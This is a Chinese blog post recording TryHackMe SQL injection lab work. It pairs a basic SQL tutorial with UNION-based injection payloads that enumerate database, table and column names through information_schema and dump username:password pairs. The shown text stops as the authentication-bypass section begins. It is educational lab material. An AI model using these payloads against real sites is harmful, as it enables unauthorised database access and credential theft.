<!DOCTYPE html>
<html lang="zh-cn" dir="ltr">
    <head><meta charset='utf-8'>
<meta name='viewport' content='width=device-width, initial-scale=1'><meta name='description' content="THM上的做题记录">
<title>SQL注入基础</title>

<link rel='canonical' href='https://Yerucrem.github.io/p/sql%E6%B3%A8%E5%85%A5%E5%9F%BA%E7%A1%80/'>

<link rel="stylesheet" href="/scss/style.min.663803bebe609202d5b39d848f2d7c2dc8b598a2d879efa079fa88893d29c49c.css"><meta property='og:title' content="SQL注入基础">
<meta property='og:description' content="THM上的做题记录">
<meta property='og:url' content='https://Yerucrem.github.io/p/sql%E6%B3%A8%E5%85%A5%E5%9F%BA%E7%A1%80/'>
<meta property='og:site_name' content='夜路归'>
<meta property='og:type' content='article'><meta property='article:section' content='Post' /><meta property='article:published_time' content='2025-03-18T00:00:00&#43;00:00'/><meta property='article:modified_time' content='2025-03-18T00:00:00&#43;00:00'/>
<meta name="twitter:title" content="SQL注入基础">
<meta name="twitter:description" content="THM上的做题记录">
    <link rel="shortcut icon" href="/favicon.ico" />

    </head>
    <body class="
    article-page
    ">
    <script>
        (function() {
            const colorSchemeKey = 'StackColorScheme';
            if(!localStorage.getItem(colorSchemeKey)){
                localStorage.setItem(colorSchemeKey, "auto");
            }
        })();
    </script><script>
    (function() {
        const colorSchemeKey = 'StackColorScheme';
        const colorSchemeItem = localStorage.getItem(colorSchemeKey);
        const supportDarkMode = window.matchMedia('(prefers-color-scheme: dark)').matches === true;

        if (colorSchemeItem == 'dark' || colorSchemeItem === 'auto' && supportDarkMode) {
            

            document.documentElement.dataset.scheme = 'dark';
        } else {
            document.documentElement.dataset.scheme = 'light';
        }
    })();
</script>
<div class="container main-container flex on-phone--column extended"><aside class="sidebar left-sidebar sticky ">
    <button class="hamburger hamburger--spin" type="button" id="toggle-menu" aria-label="切换菜单">
        <span class="hamburger-box">
            <span class="hamburger-inner"></span>
        </span>
    </button>

    <header>
        
            
            <figure class="site-avatar">
                <a href="/">
                
                    
                    
                    
                        
                        <img src="/img/avatar_hu_90a3cb9b20773d8.png" width="300"
                            height="300" class="site-logo" loading="lazy" alt="Avatar">
                    
                
                </a>
                
                    <span class="emoji">💫</span>
                
            </figure>
            
        
        
        <div class="site-meta">
            <h1 class="site-name"><a href="/">夜路归</a></h1>
            <h2 class="site-description">欢迎来到我的网站</h2>
        </div>
    </header><ol class="menu-social">
            
                <li>
                    <a 
                        href='https://github.com/CaiJimmy/hugo-theme-stack'
                        target="_blank"
                        title="GitHub"
                        rel="me"
                    >
                        
                        
                            <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-brand-github" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z" fill="none"/>
  <path d="M9 19c-4.3 1.4 -4.3 -2.5 -6 -3m12 5v-3.5c0 -1 .1 -1.4 -.5 -2c2.8 -.3 5.5 -1.4 5.5 -6a4.6 4.6 0 0 0 -1.3 -3.2a4.2 4.2 0 0 0 -.1 -3.2s-1.1 -.3 -3.5 1.3a12.3 12.3 0 0 0 -6.2 0c-2.4 -1.6 -3.5 -1.3 -3.5 -1.3a4.2 4.2 0 0 0 -.1 3.2a4.6 4.6 0 0 0 -1.3 3.2c0 4.6 2.7 5.7 5.5 6c-.6 .6 -.6 1.2 -.5 2v3.5" />
</svg>



                        
                    </a>
                </li>
            
                <li>
                    <a 
                        href='https://twitter.com'
                        target="_blank"
                        title="Twitter"
                        rel="me"
                    >
                        
                        
                            <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-brand-twitter" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z" fill="none"/>
  <path d="M22 4.01c-1 .49 -1.98 .689 -3 .99c-1.121 -1.265 -2.783 -1.335 -4.38 -.737s-2.643 2.06 -2.62 3.737v1c-3.245 .083 -6.135 -1.395 -8 -4c0 0 -4.182 7.433 4 11c-1.872 1.247 -3.739 2.088 -6 2c3.308 1.803 6.913 2.423 10.034 1.517c3.58 -1.04 6.522 -3.723 7.651 -7.742a13.84 13.84 0 0 0 .497 -3.753c-.002 -.249 1.51 -2.772 1.818 -4.013z" />
</svg>



                        
                    </a>
                </li>
            
        </ol><ol class="menu" id="main-menu">
        
        
        
        <li >
            <a href='/' >
                
                
                
                    <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-home" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <polyline points="5 12 3 12 12 3 21 12 19 12" />
  <path d="M5 12v7a2 2 0 0 0 2 2h10a2 2 0 0 0 2 -2v-7" />
  <path d="M9 21v-6a2 2 0 0 1 2 -2h2a2 2 0 0 1 2 2v6" />
</svg>



                
                <span>主页</span>
            </a>
        </li>
        
        
        <li >
            <a href='/%E5%85%B3%E4%BA%8E/' >
                
                
                
                    <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-user" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <circle cx="12" cy="7" r="4" />
  <path d="M6 21v-2a4 4 0 0 1 4 -4h4a4 4 0 0 1 4 4v2" />
</svg>



                
                <span>关于</span>
            </a>
        </li>
        
        
        <li >
            <a href='/archives/' >
                
                
                
                    <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-archive" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <rect x="3" y="4" width="18" height="4" rx="2" />
  <path d="M5 8v10a2 2 0 0 0 2 2h10a2 2 0 0 0 2 -2v-10" />
  <line x1="10" y1="12" x2="14" y2="12" />
</svg>



                
                <span>归档</span>
            </a>
        </li>
        
        
        <li >
            <a href='/search/' >
                
                
                
                    <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-search" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <circle cx="10" cy="10" r="7" />
  <line x1="21" y1="21" x2="15" y2="15" />
</svg>



                
                <span>搜索</span>
            </a>
        </li>
        
        
        <li >
            <a href='/%E5%8F%8B%E9%93%BE/' >
                
                
                
                    <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-link" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <path d="M10 14a3.5 3.5 0 0 0 5 0l4 -4a3.5 3.5 0 0 0 -5 -5l-.5 .5" />
  <path d="M14 10a3.5 3.5 0 0 0 -5 0l-4 4a3.5 3.5 0 0 0 5 5l.5 -.5" />
</svg>



                
                <span>友链</span>
            </a>
        </li>
        
        <li class="menu-bottom-section">
            <ol class="menu">

                
                    <li id="dark-mode-toggle">
                        <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-toggle-left" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <circle cx="8" cy="12" r="2" />
  <rect x="2" y="6" width="20" height="12" rx="6" />
</svg>



                        <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-toggle-right" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <circle cx="16" cy="12" r="2" />
  <rect x="2" y="6" width="20" height="12" rx="6" />
</svg>



                        <span>暗色模式</span>
                    </li>
                
            </ol>
        </li>
    </ol>
</aside>

    <aside class="sidebar right-sidebar sticky">
        
            
                
    <section class="widget archives">
        <div class="widget-icon">
            <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-hash" width="24" height="24" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <line x1="5" y1="9" x2="19" y2="9" />
  <line x1="5" y1="15" x2="19" y2="15" />
  <line x1="11" y1="4" x2="7" y2="20" />
  <line x1="17" y1="4" x2="13" y2="20" />
</svg>



        </div>
        <h2 class="widget-title section-title">目录</h2>
        
        <div class="widget--toc">
            <nav id="TableOfContents">
  <ol>
    <li><a href="#sql基础">SQL基础</a>
      <ol>
        <li><a href="#select">SELECT</a>
          <ol>
            <li><a href="#like">like</a></li>
          </ol>
        </li>
        <li><a href="#union">UNION</a></li>
        <li><a href="#insert">INSERT</a></li>
        <li><a href="#update">UPDATE</a></li>
        <li><a href="#delete">DELETE</a></li>
      </ol>
    </li>
    <li><a href="#基础做题">基础做题</a>
      <ol>
        <li><a href="#in-band-sql-injection">In-Band SQL Injection</a>
          <ol>
            <li><a href="#查询库">查询库</a></li>
            <li><a href="#查询表">查询表</a></li>
          </ol>
        </li>
        <li><a href="#身份认证绕过盲注">身份认证绕过盲注</a>
          <ol>
            <li><a href="#实际">实际：</a></li>
          </ol>
        </li>
        <li><a href="#基于布尔盲注">基于布尔盲注</a>
          <ol>
            <li><a href="#实际-1">实际：</a></li>
          </ol>
        </li>
        <li><a href="#基于时间的盲注">基于时间的盲注</a>
          <ol>
            <li><a href="#实际-2">实际：</a></li>
          </ol>
        </li>
      </ol>
    </li>
  </ol>
</nav>
        </div>
    </section>

            
        
    </aside>


            <main class="main full-width">
    <article class="main-article">
    <header class="article-header">

    <div class="article-details">
    
    <header class="article-category">
        
            <a href="/categories/web%E5%9F%BA%E7%A1%80/" >
                Web基础
            </a>
        
    </header>
    

    <div class="article-title-wrapper">
        <h2 class="article-title">
            <a href="/p/sql%E6%B3%A8%E5%85%A5%E5%9F%BA%E7%A1%80/">SQL注入基础</a>
        </h2>
    
        
        <h3 class="article-subtitle">
            THM上的做题记录
        </h3>
        
    </div>

    
    
    
    
    <footer class="article-time">
        
            <div>
                <svg xmlns="http://www.w3.org/2000/svg" class="icon icon-tabler icon-tabler-calendar-time" width="56" height="56" viewBox="0 0 24 24" stroke-width="2" stroke="currentColor" fill="none" stroke-linecap="round" stroke-linejoin="round">
  <path stroke="none" d="M0 0h24v24H0z"/>
  <path d="M11.795 21h-6.795a2 2 0 0 1 -2 -2v-12a2 2 0 0 1 2 -2h12a2 2 0 0 1 2 2v4" />
  <circle cx="18" cy="18" r="4" />
  <path d="M15 3v4" />
  <path d="M7 3v4" />
  <path d="M3 11h16" />
  <path d="M18 16.496v1.504l1 1" />
</svg>
                <time class="article-time--published">2025-03-18</time>
            </div>
        

        
    </footer>
    

    
</div>

</header>

    <section class="article-content">
    
    
    <h1 id="sql注入">SQL注入
</h1><p>SQL 语法不区分大小写。</p>
<h2 id="sql基础">SQL基础
</h2><h3 id="select">SELECT
</h3><p>我们将学习的第一种查询类型是用于从数据库中检索数据的 SELECT 查询。</p>
<p><code>select * from users;</code></p>
<p><img src="/p/sql%E6%B3%A8%E5%85%A5%E5%9F%BA%E7%A1%80/image-20250318160026857.png"
	width="1382"
	height="186"
	srcset="/p/sql%E6%B3%A8%E5%85%A5%E5%9F%BA%E7%A1%80/image-20250318160026857_hu_a1c29357c8e6bc5f.png 480w, /p/sql%E6%B3%A8%E5%85%A5%E5%9F%BA%E7%A1%80/image-20250318160026857_hu_1836b73164289f9f.png 1024w"
	loading="lazy"
	
	
		class="gallery-image" 
		data-flex-grow="743"
		data-flex-basis="1783px"
	
></p>
<p>第一个单词 SELECT 告诉数据库我们想要检索一些数据;* 告诉数据库我们想从表中接收所有列。例如，该表可能包含三列（id、username 和 password）。“from users” 告诉数据库我们想要从名为 users 的表中检索数据。最后，末尾的分号告诉数据库这是查询的结束。</p>
<p>下一个查询与上述查询类似，但这次，我们不是使用 * 返回数据库表中的所有列，而是只请求 username 和 password 字段。</p>
<p><code>select username,password from users;</code></p>
<p><img src="/p/sql%E6%B3%A8%E5%85%A5%E5%9F%BA%E7%A1%80/image-20250318160107670.png"
	width="1387"
	height="195"
	srcset="/p/sql%E6%B3%A8%E5%85%A5%E5%9F%BA%E7%A1%80/image-20250318160107670_hu_8e6c560654a76494.png 480w, /p/sql%E6%B3%A8%E5%85%A5%E5%9F%BA%E7%A1%80/image-20250318160107670_hu_2884f3b1ad65f1ab.png 1024w"
	loading="lazy"
	
	
		class="gallery-image" 
		data-flex-grow="711"
		data-flex-basis="1707px"
	
></p>
<p>与第一个查询一样，以下查询使用 * 选择器返回所有列，然后 “LIMIT 1” 子句强制数据库仅返回一行数据。将查询更改为 “LIMIT 1,1” 会强制查询跳过第一个结果，然后 “LIMIT 2,1” 会跳过前两个结果，依此类推。您需要记住，第一个数字告诉数据库您希望跳过多少个结果，第二个数字告诉数据库要返回多少行。</p>
<p><code>select * from users LIMIT 1;</code></p>
<p><img src="/p/sql%E6%B3%A8%E5%85%A5%E5%9F%BA%E7%A1%80/image-20250318160133299.png"
	width="1387"
	height="100"
	srcset="/p/sql%E6%B3%A8%E5%85%A5%E5%9F%BA%E7%A1%80/image-20250318160133299_hu_2e8a28dd945dc7a0.png 480w, /p/sql%E6%B3%A8%E5%85%A5%E5%9F%BA%E7%A1%80/image-20250318160133299_hu_116e6924d7b069e9.png 1024w"
	loading="lazy"
	
	
		class="gallery-image" 
		data-flex-grow="1387"
		data-flex-basis="3328px"
	
></p>
<p><code>select * from users where username='admin';</code></p>
<p><img src="/p/sql%E6%B3%A8%E5%85%A5%E5%9F%BA%E7%A1%80/image-20250318160158890.png"
	width="1385"
	height="98"
	srcset="/p/sql%E6%B3%A8%E5%85%A5%E5%9F%BA%E7%A1%80/image-20250318160158890_hu_cbc520106eb212d6.png 480w, /p/sql%E6%B3%A8%E5%85%A5%E5%9F%BA%E7%A1%80/image-20250318160158890_hu_5907f8e5e5f3a511.png 1024w"
	loading="lazy"
	
	
		class="gallery-image" 
		data-flex-grow="1413"
		data-flex-basis="3391px"
	
></p>
<p>这只会返回 username 等于 admin 的行。</p>
<p><code>select * from users where username != 'admin';</code></p>
<p><img src="/p/sql%E6%B3%A8%E5%85%A5%E5%9F%BA%E7%A1%80/image-20250318160228981.png"
	width="1381"
	height="145"
	srcset="/p/sql%E6%B3%A8%E5%85%A5%E5%9F%BA%E7%A1%80/image-20250318160228981_hu_d99e773ab83e0c8f.png 480w, /p/sql%E6%B3%A8%E5%85%A5%E5%9F%BA%E7%A1%80/image-20250318160228981_hu_38ec2d446e10dac6.png 1024w"
	loading="lazy"
	
	
		class="gallery-image" 
		data-flex-grow="952"
		data-flex-basis="2285px"
	
></p>
<p>这只会返回 username <strong>不</strong> 等于 admin 的行。</p>
<p><code>select * from users where username='admin' or username='jon';</code></p>
<p><img src="/p/sql%E6%B3%A8%E5%85%A5%E5%9F%BA%E7%A1%80/image-20250318160256822.png"
	width="1385"
	height="145"
	srcset="/p/sql%E6%B3%A8%E5%85%A5%E5%9F%BA%E7%A1%80/image-20250318160256822_hu_8fd58c4ebab6419d.png 480w, /p/sql%E6%B3%A8%E5%85%A5%E5%9F%BA%E7%A1%80/image-20250318160256822_hu_5fdf7827852d7790.png 1024w"
	loading="lazy"
	
	
		class="gallery-image" 
		data-flex-grow="955"
		data-flex-basis="2292px"
	
></p>
<p>这只会返回用户名等于 admin 或 jon 的行。</p>
<p><code>select * from users where username='admin' and password='p4ssword';</code></p>
<p><img src="/p/sql%E6%B3%A8%E5%85%A5%E5%9F%BA%E7%A1%80/image-20250318160336441.png"
	width="1393"
	height="97"
	srcset="/p/sql%E6%B3%A8%E5%85%A5%E5%9F%BA%E7%A1%80/image-20250318160336441_hu_acc32e764ee4417c.png 480w, /p/sql%E6%B3%A8%E5%85%A5%E5%9F%BA%E7%A1%80/image-20250318160336441_hu_c221c732b46efd62.png 1024w"
	loading="lazy"
	
	
		class="gallery-image" 
		data-flex-grow="1436"
		data-flex-basis="3446px"
	
></p>
<p>这只会返回用户名等于 <strong>admin</strong> 且密码等于 <strong>p4ssword</strong> 的行.</p>
<h4 id="like">like
</h4><p>使用 like 子句允许您指定不完全匹配，而是以特定字符开头、包含或结尾的数据，方法是选择放置由百分号表示的通配符的位置。</p>
<p><code>select * from users where username like '%n';</code></p>
<p><img src="/p/sql%E6%B3%A8%E5%85%A5%E5%9F%BA%E7%A1%80/image-20250318160440356.png"
	width="1387"
	height="190"
	srcset="/p/sql%E6%B3%A8%E5%85%A5%E5%9F%BA%E7%A1%80/image-20250318160440356_hu_78ff5acf0bd4b1a9.png 480w, /p/sql%E6%B3%A8%E5%85%A5%E5%9F%BA%E7%A1%80/image-20250318160440356_hu_8c94b8e109fd0298.png 1024w"
	loading="lazy"
	
	
		class="gallery-image" 
		data-flex-grow="730"
		data-flex-basis="1752px"
	
></p>
<p>这将返回用户名以字母 n 结尾的任何行。</p>
<p><code>select * from users where username like '%mi%';</code></p>
<p><img src="/p/sql%E6%B3%A8%E5%85%A5%E5%9F%BA%E7%A1%80/image-20250318160504321.png"
	width="1386"
	height="94"
	srcset="/p/sql%E6%B3%A8%E5%85%A5%E5%9F%BA%E7%A1%80/image-20250318160504321_hu_98281a8adc3aeea6.png 480w, /p/sql%E6%B3%A8%E5%85%A5%E5%9F%BA%E7%A1%80/image-20250318160504321_hu_4fed7ff6c4e6fca9.png 1024w"
	loading="lazy"
	
	
		class="gallery-image" 
		data-flex-grow="1474"
		data-flex-basis="3538px"
	
></p>
<p>这将返回用户名中包含字符 <strong>mi</strong> 的任何行。</p>
<h3 id="union">UNION
</h3><p>UNION 语句将两个或多个 SELECT 语句的结果组合在一起，以从单个或多个表中检索数据;此查询的规则是 UNION 语句必须在每个 SELECT 语句中检索相同数量的列，列必须具有相似的数据类型，并且列顺序必须相同。这听起来可能不是很清楚，所以让我们使用下面的类比。假设一家公司想要为所有客户和供应商创建一个地址列表，以便发布新目录。我们有一个名为 customers 的表，其中包含以下内容：</p>
<p><img src="/p/sql%E6%B3%A8%E5%85%A5%E5%9F%BA%E7%A1%80/image-20250318160608318.png"
	width="1389"
	height="189"
	srcset="/p/sql%E6%B3%A8%E5%85%A5%E5%9F%BA%E7%A1%80/image-20250318160608318_hu_428dd879d21792b8.png 480w, /p/sql%E6%B3%A8%E5%85%A5%E5%9F%BA%E7%A1%80/image-20250318160608318_hu_835186d4a4ba9826.png 1024w"
	loading="lazy"
	
	
		class="gallery-image" 
		data-flex-grow="734"
		data-flex-basis="1763px"
	
></p>
<p>另一个表叫 suppliers，内容如下：</p>
<p><img src="/p/sql%E6%B3%A8%E5%85%A5%E5%9F%BA%E7%A1%80/image-20250318160630628.png"
	width="1382"
	height="233"
	srcset="/p/sql%E6%B3%A8%E5%85%A5%E5%9F%BA%E7%A1%80/image-20250318160630628_hu_2dddac8afab7b28b.png 480w, /p/sql%E6%B3%A8%E5%85%A5%E5%9F%BA%E7%A1%80/image-20250318160630628_hu_f103617d46af75ac.png 1024w"
	loading="lazy"
	
	
		class="gallery-image" 
		data-flex-grow="593"
		data-flex-basis="1423px"
	
></p>
<p>使用以下 SQL 语句，我们可以从两个表中收集结果并将它们放入一个结果集中：</p>
<p><code>SELECT name,address,city,postcode from customers UNION SELECT company,address,city,postcode from suppliers;</code></p>
<p><img src="/p/sql%E6%B3%A8%E5%85%A5%E5%9F%BA%E7%A1%80/image-20250318160656676.png"
	width="1382"
	height="370"
	srcset="/p/sql%E6%B3%A8%E5%85%A5%E5%9F%BA%E7%A1%80/image-20250318160656676_hu_996141177df5d8b5.png 480w, /p/sql%E6%B3%A8%E5%85%A5%E5%9F%BA%E7%A1%80/image-20250318160656676_hu_27912512623d2.png 1024w"
	loading="lazy"
	
	
		class="gallery-image" 
		data-flex-grow="373"
		data-flex-basis="896px"
	
></p>
<h3 id="insert">INSERT
</h3><p><strong>INSERT</strong> 语句告诉数据库我们希望在表中插入一行新数据。 <strong>“into users”</strong> 告诉数据库我们希望将数据插入到哪个表中， <strong>“（username，password）”</strong> 提供我们提供数据的列，然后 <strong>“values （&lsquo;bob&rsquo;，&lsquo;password&rsquo;）”;</strong> 提供以前指定的列的数据。</p>
<p><code>insert into users (username,password) values ('bob','password123');</code></p>
<p><img src="/p/sql%E6%B3%A8%E5%85%A5%E5%9F%BA%E7%A1%80/image-20250318160737067.png"
	width="1387"
	height="237"
	srcset="/p/sql%E6%B3%A8%E5%85%A5%E5%9F%BA%E7%A1%80/image-20250318160737067_hu_2299b42a7593e509.png 480w, /p/sql%E6%B3%A8%E5%85%A5%E5%9F%BA%E7%A1%80/image-20250318160737067_hu_d5aafc4a61edec3c.png 1024w"
	loading="lazy"
	
	
		class="gallery-image" 
		data-flex-grow="585"
		data-flex-basis="1404px"
	
></p>
<h3 id="update">UPDATE
</h3><p><strong>UPDATE</strong> 语句告诉数据库我们希望更新表中的一行或多行数据。您使用 “<strong>update %tablename% SET</strong>” 指定要更新的表，然后选择要更新的一个或多个字段，以逗号分隔的列表，例如 “<strong>username=&lsquo;root&rsquo;，password=&lsquo;pass123&rsquo;</strong>”，最后，类似于 SELECT 语句，您可以使用 where 子句准确指定要更新的行，例如 “<strong>where username=&lsquo;admin;</strong>“</p>
<p><code>update users SET username='root',password='pass123' where username='admin';</code></p>
<p><img src="/p/sql%E6%B3%A8%E5%85%A5%E5%9F%BA%E7%A1%80/image-20250318160817369.png"
	width="1385"
	height="239"
	srcset="/p/sql%E6%B3%A8%E5%85%A5%E5%9F%BA%E7%A1%80/image-20250318160817369_hu_1a146b842164f37c.png 480w, /p/sql%E6%B3%A8%E5%85%A5%E5%9F%BA%E7%A1%80/image-20250318160817369_hu_1feee62a670e3ff5.png 1024w"
	loading="lazy"
	
	
		class="gallery-image" 
		data-flex-grow="579"
		data-flex-basis="1390px"
	
></p>
<h3 id="delete">DELETE
</h3><p><strong>DELETE</strong> 语句告诉数据库我们希望删除一行或多行数据。除了缺少要返回的列之外，此查询的格式与 SELECT 非常相似。您可以使用 <strong>where</strong> <strong>子句精确</strong>指定要删除的数据，并使用 LIMIT 子句指定要删除的行 数。</p>
<p><code>delete from users where username='martin';</code></p>
<p><img src="/p/sql%E6%B3%A8%E5%85%A5%E5%9F%BA%E7%A1%80/image-20250318160846187.png"
	width="1385"
	height="187"
	srcset="/p/sql%E6%B3%A8%E5%85%A5%E5%9F%BA%E7%A1%80/image-20250318160846187_hu_cda7583a378e4286.png 480w, /p/sql%E6%B3%A8%E5%85%A5%E5%9F%BA%E7%A1%80/image-20250318160846187_hu_5d14e1a6f115937a.png 1024w"
	loading="lazy"
	
	
		class="gallery-image" 
		data-flex-grow="740"
		data-flex-basis="1777px"
	
></p>
<p><code>delete from users;</code></p>
<p>由于查询中未使用 WHERE 子句，因此所有数据都已从表中删除。</p>
<p><img src="/p/sql%E6%B3%A8%E5%85%A5%E5%9F%BA%E7%A1%80/image-20250318160925268.png"
	width="1388"
	height="51"
	srcset="/p/sql%E6%B3%A8%E5%85%A5%E5%9F%BA%E7%A1%80/image-20250318160925268_hu_b04a9760ff2ede6d.png 480w, /p/sql%E6%B3%A8%E5%85%A5%E5%9F%BA%E7%A1%80/image-20250318160925268_hu_22142de98776489a.png 1024w"
	loading="lazy"
	
	
		class="gallery-image" 
		data-flex-grow="2721"
		data-flex-basis="6531px"
	
></p>
<h2 id="基础做题">基础做题
</h2><h3 id="in-band-sql-injection">In-Band SQL Injection
</h3><p><img src="/p/sql%E6%B3%A8%E5%85%A5%E5%9F%BA%E7%A1%80/image-20250318163151079.png"
	width="717"
	height="472"
	srcset="/p/sql%E6%B3%A8%E5%85%A5%E5%9F%BA%E7%A1%80/image-20250318163151079_hu_8d3e3435a4a000b4.png 480w, /p/sql%E6%B3%A8%E5%85%A5%E5%9F%BA%E7%A1%80/image-20250318163151079_hu_b2aef2d982353cbd.png 1024w"
	loading="lazy"
	
	
		class="gallery-image" 
		data-flex-grow="151"
		data-flex-basis="364px"
	
></p>
<h4 id="查询库">查询库
</h4><p>利用union查询的原理，先确定回显的位置。</p>
<p>构建 <code>0 UNION SELECT 1,2,3</code></p>
<p>可以看到页面情况，有三个回显位置</p>
<p>构建 <code>0 UNION SELECT 1,2,database()</code></p>
<p><img src="/p/sql%E6%B3%A8%E5%85%A5%E5%9F%BA%E7%A1%80/image-20250318162957019.png"
	width="714"
	height="174"
	srcset="/p/sql%E6%B3%A8%E5%85%A5%E5%9F%BA%E7%A1%80/image-20250318162957019_hu_3d1600a4711191ff.png 480w, /p/sql%E6%B3%A8%E5%85%A5%E5%9F%BA%E7%A1%80/image-20250318162957019_hu_349fabb68713c43f.png 1024w"
	loading="lazy"
	
	
		class="gallery-image" 
		data-flex-grow="410"
		data-flex-basis="984px"
	
></p>
<p>可以知道database的名字：sqli_one</p>
<h4 id="查询表">查询表
</h4><p>构建 <code>0 UNION SELECT 1,2,group_concat(table_name) FROM information_schema.tables WHERE table_schema = 'sqli_one'</code></p>
<p>在此查询中，需要学习一些新内容。首先，方法 <strong>group_concat（）</strong> 从多个返回的行中获取指定的列（在我们的例子中为 table_name），并将其放入一个以逗号分隔的字符串中。接下来是 <strong>information_schema</strong> 数据库;数据库的每个用户都可以访问它，它包含有关该用户有权访问的所有数据库和表的信息。在这个特定的查询中，我们有兴趣列出 sqli_one 数据库中的所有 表，即 article 和 staff_users。</p>
<p><img src="/p/sql%E6%B3%A8%E5%85%A5%E5%9F%BA%E7%A1%80/image-20250318163513022.png"
	width="708"
	height="256"
	srcset="/p/sql%E6%B3%A8%E5%85%A5%E5%9F%BA%E7%A1%80/image-20250318163513022_hu_52b29624e6f26a28.png 480w, /p/sql%E6%B3%A8%E5%85%A5%E5%9F%BA%E7%A1%80/image-20250318163513022_hu_af4d549d5f8f86d3.png 1024w"
	loading="lazy"
	
	
		class="gallery-image" 
		data-flex-grow="276"
		data-flex-basis="663px"
	
></p>
<p>由于第一级旨在发现 Martin 的密码，因此 staff_users 表是我们感兴趣的。我们可以再次利用 information_schema 数据库，通过以下查询找到此表的结构。</p>
<p><code>0 UNION SELECT 1,2,group_concat(column_name) FROM information_schema.columns WHERE table_name = 'staff_users'</code></p>
<p><img src="/p/sql%E6%B3%A8%E5%85%A5%E5%9F%BA%E7%A1%80/image-20250318163803767.png"
	width="713"
	height="236"
	srcset="/p/sql%E6%B3%A8%E5%85%A5%E5%9F%BA%E7%A1%80/image-20250318163803767_hu_536c84167fe6733d.png 480w, /p/sql%E6%B3%A8%E5%85%A5%E5%9F%BA%E7%A1%80/image-20250318163803767_hu_93e72086ea704fa0.png 1024w"
	loading="lazy"
	
	
		class="gallery-image" 
		data-flex-grow="302"
		data-flex-basis="725px"
	
></p>
<p>这与前面的 SQL 查询类似。但是，我们要检索的信息已从 table_name 更改为 <strong>column_name</strong>，我们在 information_schema 数据库中查询的表已从 tables 更改为 <strong>columns</strong>，并且我们正在搜索 table_name 列值为 staff_users 的任何行</p>
<p>查询结果为 staff_users 表提供三列：id、password 和 username。我们可以使用以下查询的 username 和 password 列来检索用户的信息。</p>
<p><code>0 UNION SELECT 1,2,group_concat(username,':',password SEPARATOR '&lt;br&gt;') FROM staff_users</code></p>
<p>同样，我们使用 group_concat 方法将所有行返回到一个字符串中，使其 更易于阅读。我们还添加了 <strong>，&rsquo;：&rsquo;，</strong> 以将用户名和密码彼此分开。我们没有用逗号分隔，而是选择了 <code>HTML &lt;br&gt;</code> 标签，该标签强制每个结果位于单独的行上，以便于阅读。</p>
<p><img src="/p/sql%E6%B3%A8%E5%85%A5%E5%9F%BA%E7%A1%80/image-20250318164023522.png"
	width="716"
	height="274"
	srcset="/p/sql%E6%B3%A8%E5%85%A5%E5%9F%BA%E7%A1%80/image-20250318164023522_hu_3d6144138148becd.png 480w, /p/sql%E6%B3%A8%E5%85%A5%E5%9F%BA%E7%A1%80/image-20250318164023522_hu_41dbb1a07f48362d.png 1024w"
	loading="lazy"
	
	
		class="gallery-image" 
		data-flex-grow="261"
		data-flex-basis="627px"
	
></p>
<h3 id="身份认证绕过盲注">身份认证绕过盲注
</h3><p>与带内 SQL 注入不同，我们可以直接在屏幕上看到攻击的结果，而盲 SQLi 是指我们几乎没有收到反馈来确认我们注入的查询是否真的成功，这是因为错误消息已被禁用，但无论如何注入仍然有效。您可能会感到惊讶，我们只需要一点点反馈即可成功枚举整个数据库。</p>
<p>最直接的盲 SQL 注入技术之一是绕过身份验证方法，例如登录表单。在这种情况下，我们对从数据库中检索数据并不那么感兴趣;我们只想通过登录。</p>
<p>连接到用户数据库的登录表单的开发方式通常使 Web 应用程序对用户名和密码的内容不感兴趣，而更关心两者是否在 users 表中形成匹配的对。简单来说，Web 应用程序会询问数据库，“您有用户名为 bob 的用户，密码为 bob123 吗？ 数据库回答 Yes 或 No （true/false），并且根据该答案，指示 Web 应用程序是否允许您继续。</p>
<p>考虑到上述信息，没有必要枚举有效的用户名/密码对。我们只需要创建一个以 yes/true 回复的数据库查询。</p>
<h4 id="实际">实际：
</h4><p>SQL 注入示例的第二级显示了这个确切的示例。我们可以在标有 “SQL Query” 的框中看到，对数据库的查询如下：</p>
<p><code>select * from users where username='%username%' and password='%password%' LIMIT 1;</code></p>
<p><em>注意：%username% 和 %password% 值取自登录表单字段。SQL Query （SQL 查询） 框中的初始值将为空，因为这些字段当前为空。</em></p>
